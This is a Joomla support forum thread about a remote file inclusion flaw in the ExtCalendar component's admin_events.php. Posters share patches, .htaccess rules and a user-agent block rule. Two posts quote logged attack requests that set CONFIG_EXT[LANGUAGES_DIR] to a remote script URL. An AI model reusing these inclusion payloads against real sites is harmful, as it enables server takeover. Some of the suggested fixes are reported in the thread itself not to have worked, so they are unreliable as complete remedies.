[UPGRADE AVAIL.] ExtCalendar Vulnerability

[ddmobley]

I will go ahead and follow your suggestion and add that code to the .htaccess file.  What I would like to know though is if extCalendar is actually vulnerable without it or this is just a precautionary measure.  If there is a real security vulnerability then there should be a change/patch to the PHP code not just some .htaccess code.  Again, I don't mind adding the .htaccess code just to be safe, but there isn't any known way someone could have exploited extcalendar without the .htaccess code, then I need to know that so I can keep looking for the security vulerability that was exploited.

The only "known" vulnerability was the link to admin_events.php.  There may be new exploits developed any day. 

The .htaccess code was designed to stop the passage of the mosConfig_absolute_path to directories and files beneath the web root. 

If your admin_events.php had the code in it to not run in standalone mode, then that is not where you were exploited.  Be sure your host has "register_globals" set to OFF.

[technopuzzle]

If you are running the latest most secure version of Joomla - version 1.0.11, then that code is already included in the default .htaccess file.

[ssherlock]

If you are running the latest most secure version of Joomla - version 1.0.11, then that code is already included in the default .htaccess file.

But it isn't loaded automatically when you load the patch...

[nathandiehl]

But it isn't loaded automatically when you load the patch...

that is because server require different 'tweaks' to the .htacess file

If i used the version that came with 1.0.11 w/out commenting one line, my site would crash. that is a GOOD thing.
Also, not everyone is using .htaccess, so it would be bad to make it active on every install!

This is indeed GOOD behavior.

[technopuzzle]

No it isn't loaded automatically. This is because each server / hosting provider is set-up / configured differently. So you may have to tweak the file to get it to work with your servers configuration. If you need help with this you can ask your hosting provider or ask in the forums.

I am one of those that had to tweak it.

[ssherlock]

But it isn't loaded automatically when you load the patch...

that is because server require different 'tweaks' to the .htacess file

If i used the version that came with 1.0.11 w/out commenting one line, my site would crash. that is a GOOD thing.
Also, not everyone is using .htaccess, so it would be bad to make it active on every install!

This is indeed GOOD behavior.

Oh I agree, it is just that the everyday user might not know about it.

[alccad]

Hi everyone and please excuse a not perfect English.
I'm a newbie using joomla, and I'm having some troubles from Extcaledar 2.0 on my site, from whom it has been attacked using admin_events.php page.
I was running Joomla 1.0.10, now I've just updated it to 1.0.11 and I turned the component off in order to get further information about this exploit and try to fix it before pubblishing it again.
On this page  http://forum.joomla.org/index.php/topic,78781.0.html I realized that my admin_events.php was missing the "defined( '_VALID_MOS' ) or die( 'Restricted access' );" line: so I put it in but I'm not sure it is enough!
So, I hope to get some hints from this topic: first of all I'd like to ask You if I can go on using Extcal 2.0 and where can I get fixes, or if I should consider a different Scheduling component. I've found com_events, which seem to have similar functions, but I'm afraid it is less safe than extcalendar.

[nathandiehl]

please see this sticky: http://forum.joomla.org/index.php/topic,79477.0.html

for info on which versions are secure, which are not, and where to find updates (if available).

note: simply turning off extcal2 doesn't protect you at all. the scripts can still run please do follow the link above and update extcal2, events and any other vunlerable components you have installed.

good luck!

[fireman]

how about a rewrite.

[ssherlock]

how about a rewrite.

Feel free

[fireman]

Feel free

If I had the time...and more skill, I would.  I spend a great deal of time running a business so I know what I am talking about here. 


Truth is,  I do a little coding here and there but I am far removed from those days of hard core hacking.  I have to consider production, ROI (Return on Investment), and cost benefit analysis.  I can't afford to have the folks under me spend countless hours (I got that from another post) trying to fix the inexorable.

My suggestion was not to mock; berate or trifle with those who are putting in the hours.  Sometimes people get so deep into trying to fix, patch, and update, that if they would have taken the time to start from scratch, less time would have been required.  This fact is not always clearly seen by those who are "in the mix" or "in the fray" due to "tunnel vision".

Just an observation.

Mark

[scott_gb]

Recently I too was attacked by a hacker through my extCalendar component. In my Recent Visitor logs I was seeing variations of this:

/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sitename/cmd.gif?

So after a search I found this forum, read through it and added the:

// Don't allow direct linking
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );

but I continued seeing this request on my Recent Visitors log with a Http Code: 200 - which I think is telling me that it was successful.

So I decided to simply remove the component. But I continued seeing this request with a 200 code. Now I would assume I would see a 404 code since the files were all removed. But I didn't, so I read more. Saw the additions to the .htaccess that were recommended and added those. And this did seem to have an effect. Now I was seeing a 302 redirect code followed by my my index page and 200 code. But this still did not seem to completely solve the problem, because i was starting to see another variation of the above attack:

//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sitename/cmd.gif?

2 forward slashes before the link. This was followed by another 200 Http Code.

So here is what I did - and I am sure the experts will tell you that it may or may not be recommended (experts please advise):
What I noticed was that all of these attacks were coming from a libwww-perl/5.805 Agent. To my knowledge only hackers have used this agent to access my site. Regular visitors tend to use more common browsers like IE, Safari, Opera and Firefox. So I did a little research and found that I could add to my .htaccess another Rewrite that would forbid this agent altogether. I have added the following Condition to a list of known bad bots agents. Below is a simplified rule without the other offending agents.

RewriteCond %{HTTP_USER_AGENT} ^libwww.*
RewriteRule ^(.*)$ http://www.mysite.com/

After adding this each Recent Visitor attempt is followed by a Http Code 403 - forbidden. It is my hope that this has stopped any successful attacks.

To all  experts out there, feel free to tear my post apart. I have no ego in writing this. My intention is only to share my miserable existence.

[fireman]

finally, a calendar that works.

http://extensions.joomla.org/component/ ... Itemid,35/

[theflyingdutchman]

finally, a calendar that works.

http://extensions.joomla.org/component/ ... Itemid,35/

looks gr8 indeed.
in my opinion i still miss a yearly based view to make a print for a complete year overview (for my purpose a needed feature)

cheers

[vdrover]

finally, a calendar that works.
http://extensions.joomla.org/component/ ... Itemid,35/

Looks like you beat me to it fireman, but in any case, here is the official announcement for this thread:

I am happy to announce that we have released JCal Pro.

All the details of the features as well as thorough documentation and forums can be found at the home of JCal Pro.

Cheers,
V-man

[v0d00child]

Is there a new secure version of ExtCalender we can use?

I think I've missed something here... in my themes/default/theme.php it looks like the download I have someone has repaired the loop hole... anyone tested this for the vunerability, I really love this mod and would hate to have to give it up!!

Get the latest version of ExtCalendar at:
http://extcal.sourceforge.net
**********************************************
Modified 7/11/2006 by David McKinnis for Mambo/Joomla! version - _VALID_MOS check
*/

defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );

EDIT: Feeling rather silly, just jumped to the last post in the thread.... ....  yeppieee... I'm going to install JCal Pro now!!

[Joomlamahesh]

I have alredy upgraded the Ext Calendat and .htaccess. While scannin the log file today I found following type of accesses


/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ortaksohbet.com/lol1.txt? 
  Http Code: 200  Date: Dec 09 04:23:55  Http Version: HTTP/1.1  Size in Bytes: 58 
  Referer: - 
  Agent: libwww-perl/5.803 

Does this means somebody trying to use my server for some malicious purpose. I have got many such entries in my log file ?

This also means that the secure version of Ext Cal is not so secure. My RG=Off and I am not emulating also.

[Daniel Tulp]

if extcal won't be supported any more, will/ is there be some migration script to another calender/ events component?

[rliskey]

This topic strayed into a fork/development discussion. Good discussion, but it was not really security related. Has been moved to the 3RD Components forum.